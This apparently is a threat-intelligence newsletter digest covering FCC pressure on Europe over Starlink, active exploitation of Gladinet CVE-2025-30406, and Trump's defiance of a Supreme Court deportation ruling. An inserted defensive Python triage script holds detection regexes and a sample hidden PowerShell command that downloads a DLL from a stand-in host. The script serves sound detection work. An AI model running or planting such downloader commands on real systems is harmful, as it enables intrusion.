Analyst Comments: Carr's comments signal a clear intensification of U.S. pressure on allies to adopt American communications infrastructure and resist China’s influence in satellite and AI ecosystems. This messaging coincides with broader Trump-era policies that pair trade tariffs with strategic industrial alignment. European regulators, wary of Starlink’s unpredictability—especially after Washington threatened to disable service in Ukraine—face difficult trade-offs between autonomy, security, and cost. Carr’s public callout of EU “bias” and protectionism may deepen transatlantic tensions at a time when cooperation is critical for coordinating on AI governance, 5G/6G standards, and cybersecurity. The U.S. offer of faster regulatory clearance for Nokia and Ericsson if they shift more operations stateside also highlights Washington’s intent to realign the global telecom supply chain around U.S. soil.
FROM THE MEDIA: FCC chair Brendan Carr called on Europe to decisively choose between U.S. and Chinese telecom and satellite infrastructure, advocating for Elon Musk’s Starlink as the preferred provider. Starlink, owned by Musk’s SpaceX, has been trialed by UK firms like BT and Virgin Media O2 but remains under scrutiny after U.S. officials previously threatened to cut service to Ukraine. Carr, a staunch ally of Musk, accused the European Commission of holding an “anti-American” regulatory bias and described the EU’s hesitance as a sign of being “caught” between geopolitical camps. He warned of a widening “great divide” in global communications technology. While Europe is developing its own satellite capabilities, industry analysts note that no single EU-based system currently matches Starlink’s capacity or coverage. Meanwhile, Carr encouraged Ericsson and Nokia to relocate more of their manufacturing to the U.S. to avoid Trump’s looming tariff regime and suggested expedited regulatory support in return. The comments arrive amid surging interest in securing Europe’s military and civilian satellite networks as transatlantic telecom rivalry deepens.
READ THE STORY: FT
Critical RCE Vulnerability in Gladinet CentreStack and Triofox Exploited in Active Attacks
Bottom Line Up Front (BLUF): A critical remote code execution (RCE) vulnerability tracked as CVE-2025-30406 is actively being exploited in the wild, affecting both Gladinet CentreStack and Triofox products. The flaw, stemming from a hardcoded cryptographic key, has already been used to compromise at least seven organizations, enabling attackers to execute arbitrary code and gain persistent remote access.
Analyst Comments: The exploitation of CVE-2025-30406 follows a worrying trend where zero-day vulnerabilities in remote access tools are used for deep infiltration into networks. The post-exploitation activity, including DLL sideloading, use of encoded PowerShell scripts, and lateral movement via MeshCentral and Impacket tools, demonstrates a high level of attacker sophistication. Organizations using CentreStack or Triofox should immediately upgrade to patched versions and audit historical activity dating back to early April for signs of compromise.
FROM THE MEDIA: Huntress researchers disclosed that the remote code execution vulnerability CVE-2025-30406, originally found in Gladinet’s CentreStack, also affects its Triofox product. The flaw arises from the presence of a hardcoded cryptographic key, which attackers can exploit to execute code remotely on exposed systems. While a patch for CentreStack (v16.4.10315.56368) was issued on April 3, Triofox remains vulnerable up to version 16.4.10317.56372. Huntress observed successful exploitation in at least seven organizations, with initial compromise activity traced back to April 11. Attackers leveraged the vulnerability to download and sideload malicious DLLs via encoded PowerShell scripts, similar to tactics seen in other recent exploits like the CrushFTP attacks. Further activity included installing MeshCentral for persistence, running Impacket for system enumeration, and deploying MeshAgent.
READ THE STORY: THN
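One way to act on the audit recommendation above, as an added example that is not Huntress's or Gladinet's code: a Python triage that checks a reported product version against the builds quoted in the story and decodes -EncodedCommand process command lines to look for the downloader, DLL sideload and MeshAgent patterns the report describes. The version boundaries come from the story; the regexes, function names and sample log lines are my own constructions.

```python
import base64
import re

# Version boundaries quoted in the story. Only CentreStack's fixed build is
# given; for Triofox the page gives the last version still affected.
CENTRESTACK_FIXED = (16, 4, 10315, 56368)
TRIOFOX_LAST_VULNERABLE = (16, 4, 10317, 56372)

def parse_version(version):
    return tuple(int(part) for part in version.split("."))

def centrestack_is_patched(version):
    return parse_version(version) >= CENTRESTACK_FIXED

def triofox_is_vulnerable(version):
    return parse_version(version) <= TRIOFOX_LAST_VULNERABLE

# Post-exploitation tooling named in the report; the patterns are my own.
INDICATORS = {
    "dll_sideload": re.compile(r"(downloadfile|downloadstring|invoke-webrequest)[^\n]*\.dll", re.I),
    "meshagent": re.compile(r"mesh(agent|central)", re.I),
    "impacket": re.compile(r"impacket", re.I),
}
ENCODED_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_powershell(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except ValueError:  # malformed base64 or not UTF-16 text
        return None

def triage_commandline(cmdline):
    """Return the indicator names matched by one process command line, after decoding."""
    decoded = decode_encoded_powershell(cmdline)
    text = cmdline if decoded is None else ENCODED_FLAG.sub(" ", cmdline) + "\n" + decoded
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

# Constructed sample log: a hidden encoded downloader, a MeshAgent install, benign noise.
def encode_powershell(script):
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/u.dll','C:\\ProgramData\\u.dll')"
SAMPLE_LOG = [
    "powershell.exe -nop -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT),
    "C:\\ProgramData\\MeshAgent\\MeshAgent.exe -install",
    "notepad.exe C:\\Users\\admin\\notes.txt",
]
```

Run `triage_commandline` over process-creation events from early April onward; a hit on the decoded downloader or on MeshAgent is a lead to investigate, not proof of compromise.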
Items of interest
Trump Defies Supreme Court, Escalates Authoritarian Governance in Deportation Standoff
Bottom Line Up Front (BLUF): President Donald Trump openly defied a unanimous U.S. Supreme Court ruling by refusing to repatriate Kilmar Armando Abrego Garcia, an individual wrongfully deported under his administration. Trump falsely claimed the Court ruled in his favor, a stance echoed by key members of his cabinet and by El Salvador’s President Nayib Bukele, in whose country Garcia is currently being held. The move has ignited concerns over the erosion of U.S. constitutional norms, judicial independence, and civil liberties.
Analyst Comments: By rejecting a 9-0 Supreme Court decision, Trump has asserted executive supremacy over the judiciary—a move that legal experts argue dismantles constitutional governance. The administration’s embrace of foreign authoritarian models, exemplified by the alignment with Bukele and the opaque prison contracts in El Salvador, reflects a shift toward extrajudicial rule. The implications are profound, not just for deportees, but for all citizens, as traditional legal protections around due process, habeas corpus, and administrative oversight are increasingly bypassed or undermined.
FROM THE MEDIA: Trump’s refusal to comply with the Supreme Court ruling on Garcia’s repatriation marks the first known instance of a U.S. president disregarding a unanimous high court decision in modern history. Garcia, deported under dubious national security claims, was confirmed not to be a threat by a government attorney who has since been suspended. Trump, alongside El Salvador’s President Bukele, declared Garcia a terrorist without evidence and refused to repatriate him, violating the court’s order. This follows a pattern of behavior including the persecution of critics like former CISA director Chris Krebs, aggressive media targeting, and the weaponization of regulatory bodies such as the FCC. Experts and human rights organizations warn that the U.S. government under Trump is now flirting with authoritarianism, where executive power supersedes judicial mandates and dissent is met with punitive retaliation.
READ THE STORY: FT
El Salvador's "Dictator" Key to Disappearing Migrants Like Kilmar Abrego Garcia (Video)
FROM THE MEDIA: Salvadoran President Nayib Bukele is meeting with President Donald Trump at the White House on Monday, part of a growing alliance between the two right-wing leaders. In recent months, El Salvador has imprisoned hundreds of people for the Trump administration who were expelled from the United States with little or no due process, ending up in the brutal mega-prison known as CECOT.
Inside El Salvador prison housing deported US migrants (Video)
FROM THE MEDIA: ABC News goes inside Cecot, the notorious El Salvadoran mega-prison where the Trump administration has deported hundreds of alleged gang members.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.